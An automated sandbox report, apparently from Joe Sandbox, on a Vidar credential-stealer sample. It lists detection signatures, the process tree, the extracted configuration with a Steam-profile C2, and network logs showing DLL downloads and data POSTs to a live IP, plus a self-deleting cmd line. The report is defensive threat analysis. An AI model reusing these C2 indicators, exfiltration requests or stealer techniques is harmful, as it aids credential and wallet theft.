Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1447265
MD5:22152460b13e4c2473dc3fcdea192933
SHA1:48ce4a69302e860cd905cd02a10aac942f09d9f3
SHA256:51cba9b4aefefaf72a791e1929f98553f50d643a22179a6aaac9d13f45ea8b43
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 5072 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 22152460B13E4C2473DC3FCDEA192933)
    • RegAsm.exe (PID: 4784 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 5608 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KECBFBAEBKJJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2244 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "c21b45a432889af65aa05cd66920d0a2", "Version": "9.8"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
        • 0x221f0:$s1: JohnDoe
        • 0x32f80:$s1: JohnDoe
        • 0x221e8:$s2: HAL9TH
        00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: file.exe PID: 5072JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            SourceRuleDescriptionAuthorStrings
            1.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              1.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
              • 0x221f0:$s1: JohnDoe
              • 0x32f80:$s1: JohnDoe
              • 0x221e8:$s2: HAL9TH
              0.2.file.exe.3a7ac0.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0.2.file.exe.3a7ac0.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x20df0:$s1: JohnDoe
                • 0x20de8:$s2: HAL9TH
                0.2.file.exe.3a7ac0.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  No Sigma rule has matched
                  No Snort rule has matched

                  AV Detection

                  Source: file.exeAvira: detected
                  Source: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "c21b45a432889af65aa05cd66920d0a2", "Version": "9.8"}
                  Source: file.exeReversingLabs: Detection: 42%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,1_2_004062A5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00406242
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,1_2_004082DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,1_2_0040245C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00410DAC CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_00410DAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC46C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,1_2_6CC46C80
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.6:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.6:49711 version: TLS 1.2
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                  Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                  Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394303 FindFirstFileExW,0_2_00394303
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,1_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_004162AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,1_2_004153F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004094E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040C679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00415AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409F72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00409900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,1_2_0040A981
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,1_2_00415E66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,1_2_00415843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior

                  Networking

                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199689717899
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 104.102.42.29 104.102.42.29
                  Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJDBKJKFIECAAAKFBFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 7885Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEHIECFCAAFIEBGIDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 98173Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBKKKEHDHDGDGCFBKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_0040514C
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                  Source: unknown HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.6:49710 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.6:49711 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_004112FD

                  System Summary

                  Source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.3a7ac0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.3a7ac0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_6CC9B8C0 rand_s,NtQueryVirtualMemory,1_2_6CC9B8C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_6CC9B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,1_2_6CC9B910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_6CC9B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6CC9B700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_6CC3F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6CC3F280
                  Source: C:\Users\user\Desktop\file.exe Code function: String function: 00385050 appears 48 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6CC794D0 appears 90 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6CC6CBE8 appears 134 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004024D7 appears 311 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004180A8 appears 104 times
                  Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.3a7ac0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.3a7ac0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/27@1/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_6CC97030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,1_2_6CC97030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_004111BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,1_2_004106C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199689717899[1].htm
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
